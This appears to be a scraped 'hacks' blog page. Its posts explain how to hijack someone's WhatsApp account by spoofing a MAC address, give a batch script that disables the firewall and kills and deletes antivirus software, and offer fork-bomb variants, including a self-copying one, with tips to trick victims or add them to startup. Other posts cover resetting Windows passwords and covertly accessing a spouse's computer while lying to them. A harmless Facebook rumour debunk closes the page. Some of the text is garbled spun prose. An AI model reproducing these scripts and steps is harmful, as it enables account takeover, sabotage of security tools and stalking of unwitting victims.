Showing posts with label hacks. Show all posts
Showing posts with label hacks. Show all posts

Saturday 6 June 2015

How to hack Whatsapp account

We have received many requests for some advance level Hacking tips so in this post of Learn Hacking, we are going to share one of our Coolest Hacks till date ie.. How to Hack Whatsapp Account 

About Whatsapp
Though I am pretty sure most of you might be knowing about whatsapp but still here is a brief into about the same.

Whatsapp Messenger is a cross platform quick messaging application. Whatsapp is assured really the foremost fashionable quick electronic messaging for smartphones. Whatsapp Messenger is accessible for iPhone, Android, Windows Phone, Blackberry and Nokia and yes, those phones can all message each other. And you all have heard of it if you are not using it. Given below are the several whatsapp hacks or tricks you should know if you are using whatsapp.

Whatsapp hack to spy on some other account
So if all of you have noticed you cannot have your whatsapp account logged in two devices. Means session is given to only one MAC address. If the MAC (Media Access Control) address of the device seeking access changes then whatsapp asks you to again verify your account.
How to Hack Whatsapp Account
All you need is to get access to victim phone to get the victims phone “MAC address along with the verifying massage” which is acquired to verify your device.
·         Get mac address on your android phone.
·         Finding MAC address on an Android Phones
·         On your phone’s home screen, click on menu, then go to setting.
·         Click on about phone.
·         Click on the status.
·         And then view your Wi-Fi MAC address.
·         As soon the message is received Push the MAC address as well as Verifying code to your server or mail it your ID. That banks on your convince.
·         Cheat your phone’s MAC address to the Victims address and install whatsapp and after that type the verify code.
·         And now its done. You get full access to the victim’s whatsapp ID. So now you can keep spying/watching your victim’s movements.
·         That means you and the victim is using the same ID from different devices.
·         Whatsapp hack to use it by not using your number
·         This hack works by cheating the Whatsapp Verification Servers by sending a spoofed request for an authorisation code expected for a different phone.
·         Install Whatsapp on your device. Whatsapp now opens a counter where it sends a verification message to its servers.
·         Block the message service – it can be blocked by changing the message centre number or turning the phone into Airplane mode.
Whatsapp now gives a substitute method of verification – Select verify through SMS and fill in your email address. Once you click to send the SMS press cancel to abort the call for authorisation to the Whatsapp server.
·         Now you have to do sms Spoofing.
·         Examine your outbox and copy the message details into the spoofer application and send the spoofed verification.
·         You will now receive messages expected for the spoofed number on your mobile device and you can communicate with people under the spoofed number.
Note:- This information has been shared to create awareness among people regarding the “Ways to Hack Whatsapp” so that you can protect yourself from getting hacked. In no way do we promote misusing of the information.
Now that you know How to Hack Whatsapp account, you are good to protect yours.

HOW TO DISABLE YOUR VICTIM’S ANTIVIRUS

Copy this Code…
Code:


@ echo off


rem –
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:Program Filesalwils~1avast4*.*
del /Q /F C:Program FilesLavasoftAd-awa~1*.exe
del /Q /F C:Program Fileskasper~1*.exe
cls
del /Q /F C:Program Filestrojan~1*.exe
del /Q /F C:Program Filesf-prot95*.dll
del /Q /F C:Program Filestbav*.dat
cls
del /Q /F C:Program Filesavpersonal*.vdf
del /Q /F C:Program FilesNorton~1*.cnt
del /Q /F C:Program FilesMcafee*.*
cls
del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:Program FilesNorton~1Norton~1*.*
del /Q /F C:Program FilesNorton~1*.*
cls
del /Q /F C:Program Filesavgamsr*.exe
del /Q /F C:Program Filesavgamsvr*.exe
del /Q /F C:Program Filesavgemc*.exe
cls
del /Q /F C:Program Filesavgcc*.exe
del /Q /F C:Program Filesavgupsvc*.exe
del /Q /F C:Program Filesgrisoft
del /Q /F C:Program Filesnood32krn*.exe
del /Q /F C:Program Filesnood32*.exe
cls
del /Q /F C:Program Filesnod32
del /Q /F C:Program Filesnood32
del /Q /F C:Program Fileskav*.exe
del /Q /F C:Program Fileskavmm*.exe
del /Q /F C:Program Fileskaspersky*.*
cls
del /Q /F C:Program Filesewidoctrl*.exe
del /Q /F C:Program Filesguard*.exe
del /Q /F C:Program Filesewido*.exe
cls
del /Q /F C:Program Filespavprsrv*.exe
del /Q /F C:Program Filespavprot*.exe
del /Q /F C:Program Filesavengine*.exe
cls
del /Q /F C:Program Filesapvxdwin*.exe
del /Q /F C:Program Fileswebproxy*.exe
del /Q /F C:Program Filespanda software*.*
rem –

And go to your desktop, create a new text document, paste it there and save it as anyname.bat while choosing file type as all files…

Thursday 4 June 2015

How to hack any lock application on android

Hi geeks, today I brought to you a new trick to unlock any lock application on android. As a matter of privacy we mostly lock our gallery, phone book, file manager, messengers, WhatsApp etc. So you got a friends phone in your hand now you want to open the gallery to see the photos and suddenly you see the lock application pops up an asks you to type the password in to unlock the gallery, oh its annoying isn’t it, while we pass the phone back to our friend and ask him to type the password and unlock it .Hmm it really is annoying but now you don’t need to pass the phone back or ask for a password because now you are smart enough to unlock almost any lock application you want and browse the phone freely without any hindrances.
Steps you need to follow:-

Wednesday 25 February 2015

How to Hack Windows Administrator Password

This particular publish will highlight how you can crack Home windows Administrator password sometimes whenever you overlook this or even when you wish in order to access some type of computer that you don't know the actual password.Just about everyone has skilled a scenario exactly where within we have to access some type of computer that is pass word guarded or even sometimes we might your investment manager pass word without having that this gets not possible in order to record into the pc. Therefore, if you're fairly inside a exact same type of scenario, right here is a superb crack utilizing which you'll totally reset the actual pass word or even help to make the actual pass word bare (remove the actual password) to be able to obtain administrator use of the actual pc.

Hacking the Windows Admin Password:

You can do this with a small tool called  Offline NT Password & Registry Editor. This particular utility works offline, which means you have to turn off as well as trunk away your pc utilizing a floppy drive, COMPACT DISC or even HARDWARE gadget (such because pencil drive). The actual device has got the subsequent functions:
 You don't to understand the actual aged pass word to create a brand new.
 This particular device may identify as well as uncover secured or even handicapped away person company accounts.
 There's also a registry publisher along with other registry resources which functions below linux/unix, as well as may be used with regard to other activities compared to pass word modifying.


How it Works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config.

Thursday 20 November 2014

Fork bomb {complete tutorial}

Picture of how to make a fork bomb exe
this will teach you how to make a harmless fork bomb program which will lock up a computer when run.

note:
yes you can modify this to make a DOS error but im not going to be the idiot to tell you how

Step 1: Making the .bat

Picture of making the .bat
open up notepad and enter the following text:
:fork
start %0
%0|%0
goto :fork

save it as something.bat
to the desktop


there are about a million different ways to do this, i gave you disputably the best one, other variants include:

my favorite is the spread like a real virus bomb

explorer bomb:
:e
start %0
start C:\Windows\explorer.exe
%0|%0
goto :e

program bomb:
:e
start %0
start anyprogramyouwant
%0|%0
goto :e

the mini bomb:
%0|%0

inefficient bombs:
#1:
:e
start
start
start
goto :e

#2:
:e
start cmd.exe
goto :e

#3
:e
start (name of the batch file)
goto :e

slap in the face for deleting this bomb:
IF (DELETE whatever.bat) goto :e
IF (ERASE whatever.bat
:e
start %0
%0|%0
goto :e

matrix bomb:
@echo off
color 0a
:x
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% (lots of randoms)
start %0
%0|%0
goto :x

spread like a real virus bomb:
:e
copy /Y %0 %random%.bat
start %0
%0|%0
goto :e

alphabet fork:
:a
start %0
%0|%0
goto :a
:b
start %0
%0|%0
goto :b
:c
start %0
%0|%0
goto :c
:d
start %0
%0|%0
goto :d
:e
start %0
%0|%0
goto :e
:f
start %0
%0|%0
goto :g
:h
start %0
%0|%0
goto :i
:j
start %0
%0|%0
goto :j
:k
start %0
%0|%0
goto :k
:l
start %0
%0|%0
goto :l
:m
start %0
%0|%0
goto :m
:n
start %0
%0|%0
goto :n
:o
start %0
%0|%0
goto :o
:p
start %0
%0|%0
goto :p
:q
start %0
%0|%0
goto :q
:r
start %0
%0|%0
goto :r
:s
start %0
%0|%0
goto :s
:t
start %0
%0|%0
goto :t
:u
start %0
%0|%0
goto :u
:v
start %0
%0|%0
goto :v
:w
start %0
%0|%0
goto :w
:x
start %0
%0|%0
goto :x
:y
start %0
%0|%0
goto :y
:z
start %0
%0|%0
goto :z
:bob
start %0
%0|%0
goto :bob

Step 2: Convert to exe

Picture of convert to exe
download bat to exe converter
http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html
extract it to the desktop and run it
chose your something.bat for the batchfile and an icon if you want
press compile
there should be a something.exe on your desktop

Step 3: Deploy

Picture of Deploy
2.JPG
now this can be run on any machine that runs exe's
you can trick a friend into running it once for fun, or you can use it with an autorun.ini on a cd to make it run as soon as its inserted
or you could be more deviant and make it run every time the user logs in, to do this just drag and drop it to the startup folder in the start menu

25 deadliest notepad viruses .







Here I am posting scripts which are used in creating a virus using
notepad. Some of them will works on windows xp and some of them in windows 7.


First thing you need to do is to open notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r run window will open and
type notepad and hit enter .

No 1:- 


Saturday 15 November 2014

Internet security system.

                       ETHICAL HACKING

Free e-book on ethical hacking Internet Security System, hack like a pro. This E-book contains the following contents:

1. Attack types and vulnerabilities.
a. Case study: The dangers of mobile code

2. Searching for public corporate information.
a. Passive information gathering
b. ICANN

3. Searching for technical information.
a. Gathering technical information
b. Zone transfer
c. Significant resource record (RR's)
d. Tools used to query name servers

4. Network scanning.
a. Firewall and gateway design traits
b. Ping sweeps
c. Traceroute
d. Network mapping
e. SMTP headers
f. Local scanning and sniffing

5. Interpreting network results.
a. Live hosts

6. Host scanning.
a. Vulnerability scanning
b. Masterclass: Port scanning and OS identification

7. Interpreting host results.
a. Masterclass: Good firewall design
b. Packet filtering TCP/UDP/ICMP
c. Proxy servers
d. Network level firewall and application level

8. Vulnerability and exploit research.
a. Buffer overflow
b. Detecting buffer overflows
c. Exploit Chains
d. Web servers and FTP sites
e. IRC

9. Theoretical exploitation.
a. Web spoofing
b. Distributed denial of service attack
c. Attack survival
d. Attack prevention
e. Attack forensics

10. Exploitation in action.
a. RDS exploit
b. eEye
c. Firewall-1 dos/jolt2.c and cpd.c
d. Back orifice 
e. Buffer overflows
f. TCP session hijacking

11. Summary.
a. Passive information gathering
b. Active information gathering
c. Firewall and router assessment
d. Mitnick versus shimomura

Sharing is Caring.
Click the download button below to get this E-book for free.




Friday 14 November 2014

How to Hack a Computer

Hacking a computer is a useful and, at times, an important skill to pick up. Below are instructions for getting past a password (if you find yourself logged out of a computer or want to check up on your child or spouse), gaining remote access to a computer (to check on a user or help locate a stolen machine), or crack a wifi password (in the event of an emergency, such as if you become lost in an unfamiliar city and you need to look up directions.

Method 1 of 2: Getting Past a Log In Password


1 Boot the computer in safe mode.


2 Click “Start”.


3 Click “Run”.


4 Type in “control userpasswords2”.[1]


5 Change passwords for any account. This is probably going to be obvious to the user, so you may have to tell them a little white lie. Try something along the lines of: "Oh, I hear computers glitch like that sometimes. You can always type in recoverpassword if you get locked out and then set a new password" (in which case you will want to set the password to the account to recoverpassword or whatever you tell this person).[2]


6 Reboot the computer.

Method 2 of 2: Getting Remote Access


1 Download the program LogMeIn. There is a free version, though you can purchase a subscription if that better meets your needs.[3]
The program will need to be downloaded to the computer you intend to remotely view or use. This makes it useful for gaining access to your computer if it is stolen or for checking up on your teen’s daytime activities during the summer.

You will have to make an account with the LogMeIn website in order to use the software.



2 Log in to the website. Log in to LogMeIn’s website.


3 Navigate to the “My Computers” page. It should open automatically when you sign in.


4 Add the computer you intend to remotely access. You will see an “Add computer” button on the page. Click that and fill in the info for the computer you intend to access.


5 Click the name for the computer once it’s added.


6 Log on to the computer. This means you’ll have to know the username and password for the account you’re trying to access or view.


7 Click “Remote Control”. If you’re trying to be sneaky (such as to spy on the user), try to move the mouse as little as possible and don’t click on anything.


8 Log out when you’re done.

How to Track Who Views Your Facebook Profile



Why can't I see who is stalking my Facebook profile?
There are other social networks that do let you see who's viewed your profile, mainly LinkedIn and its "Who's Viewed Your Profile" feature.
Regular users can see a recent list of who has been spying on you, along with some basic analytics, while paid users can see up to 90 days worth of viewers, as well as more detailed analytics. It's great for seeing potential job interest and company prospects.
And what's better than finding a hot girl that has a great job? Finding one that viewed your profile. So, why doesn't Facebook jump on board? How great would it be to know when a girl you just friended viewed your profile and photos? It would be pretty clutch.
While there isn't a built-in feature to see who exactly has checked you out, you still might be able to get some information on how often your Facebook friends are viewing your profile.

Can You Use Facebook's "InitialChatFriendsList"?

Many rumors on the web claim that Facebook secretly exposes your recent visitors in an array variable (aka: a list of IDs) in the page source code called the InitialChatFriendsList. While this variable does not actually contain the IDs of people stalking your profile, it does give us an interesting peek into how Facebook's algorithms rank your relationships with your friends.
Facebook prioritizes the friends in your chat list using an internal (not-publicly documented) algorithm that appears to be based off of how often you communicate with each of your friends. From my research it appears to take into account recent interactions (in messages, chat, or comment threads) and frequency of recent chats.
It's rumored across the web that the person located at the very top of your "InitialChatFriendsList" is the person who last looked at your profile, but this is wrong. People you never have contact with will most likely be at the very bottom, and those that you communicate with more frequently will probably be up top.

Debunking the InitialChatFriendsList Stalker Rumor...

For me, the first three profiles that showed up were with people that I messaged or chatted with yesterday. To substantiate my claim that thisdoes not show people viewing you, I had my roommate check out my profile about 25 times in an hour. I went back in to check my list, and it remained unchanged.
So, it most definitely does not prioritize people checking out your profile at the top of the list. But still, it's a fun way to check out who you have contact with most (though, you should probably already know that).

Finding the InitialChatFriendsList

If you'd like to view it for yourself, you can easily find this list by viewing the source code of your profile page. To do this, just go to your profile page, right-click in an empty area on the side, and select "View Page Source."
Image via wonderhowto.com
This will you show the page's source code. From here, go ahead and pressCommand+F (Mac) or Control+F (Windows) to open the find feature. In the search field, enter InitialChatFriendsList and you'll be taken to the list in the code.
However, it will not show names or links to your friends' profiles. Instead, it shows their Facebook IDs (numbers).
This large list of profile IDs (each separated by commas) is actually your full list of friends.

Turning Numbers into Names

To see whose face matches a number, go ahead and copy the number ID of who you want to check out. You only need to copy the full number that appears in-between the quotation marks, and before the hyphen (the last number after the hyphen doesn't matter).
Then just paste it into a new tab or window using the URL below, substituteNUMBERID for your friend's actual ID number.
Hit enter and you'll be taken to your friend's profile.

A More Visual Approach...

If diving into the source code seems too intimidating, you can see a visual representation of the top few people in your InitialChatFriendsList by doing the following:
  1. From the desktop view (this won't work on mobile), make sure your browser window is small enough to hide the sidebar, making the chat window float at the bottom right of your browser window.
  2. If you're logged into chat, turn off chat for all friends (you can do this using the gear icon). You'll need to do this as chat will reorder the list based on who's online whenever you're signed in.
  3. Refresh the browser window (this makes sure it doesn't remember who's online and who isn't).
  4. Click the little "Chat (off)" bar at the bottom right to switch it on, and pay close attention to the list of friends you initially see.
  5. For a second or two, the friends you'll see will be the ones from your InitialChatFriendsList.
  • Note 1: You'll have to look closely as the moment chat finishes logging you in, it'll get an updated list based on who's currently online. Once you see green dots next to anyone's name, you'll know it's now showing your online friends instead of your InitialChatFriendsList.
  • Note 2: You can always repeat steps 2-4 if you miss it the first time.
  • Note 3: Once chat is online, those who are online are pushed up to the top, with the secondary sort being based off of the InitialChatFriendsList order.

Faster Alternative Method...

If you have the updated Facebook look, it's easier to do the reverse and expand the width of your browser window until you see the combo Ticker and Chat sidebar. This will actually show you a list of your friends whether you have Chat turned on or off, so you have all the time in the world to look at the top of the InitialChatFriendsList.
You can adjust the slider to make the Chat box bigger to see more friends. If you still see the grey "Chat (off)" box in the bottom, you probably don't have the updated look yet.
Really, this is just a more visual way to debunk the theory that the people listed first are the people spying on your profile.

The Next Best Thing: Groups and Messages

The notorious "Seen By" feature is built into the Messages and Group sections. Anytime a post or photo is uploaded, you can check to see who saw the item right there in the message.
Of course, this isn't the same as seeing everyone that viewed your profile, but you can at least see everyone that viewed your message or group post. Since I hate this feature, I'm glad this hasn't leaked out to any other Facebook applications.

Beware of False Applications

Do not give any Facebook application that claims to show you who's viewed your profile access to your account data, and do not download any third-party program onto your computer that promises the same. They do not work. These are basic phishing attempts meant to spam you and your friends or steal your login data. Never click any links on facebook claiming to know who viewed yours, or your friends profiles. They're all scams. Guaranteed.

Will There Ever Be a Way?

So, while there is no current way to see who has actually viewed your Facebook profile, you can see who has recently been in some sort of contact with you through the InitialChatFriendsList, and see who has viewed your comments or posts in a Group or Message.
Given the number of (fairly successful) scams based on seeing who's viewed your profile, it's clear that the demand for such a feature is there. But the current anonymity does allow for worry-free browsing of friends profiles without worrying about them thinking (realizing?) you're stalking them. It's a delicate balance that I doubt they'll change, as doing so would ultimately change many people's behavior on the site.
Let us know in the comments if you think Facebook should create a "Viewed By" feature or if you like the anonymity as that's currently provided

 

© 2014 US Helplines. All rights resevered - US Helplines - Designed by Templateism

Back To Top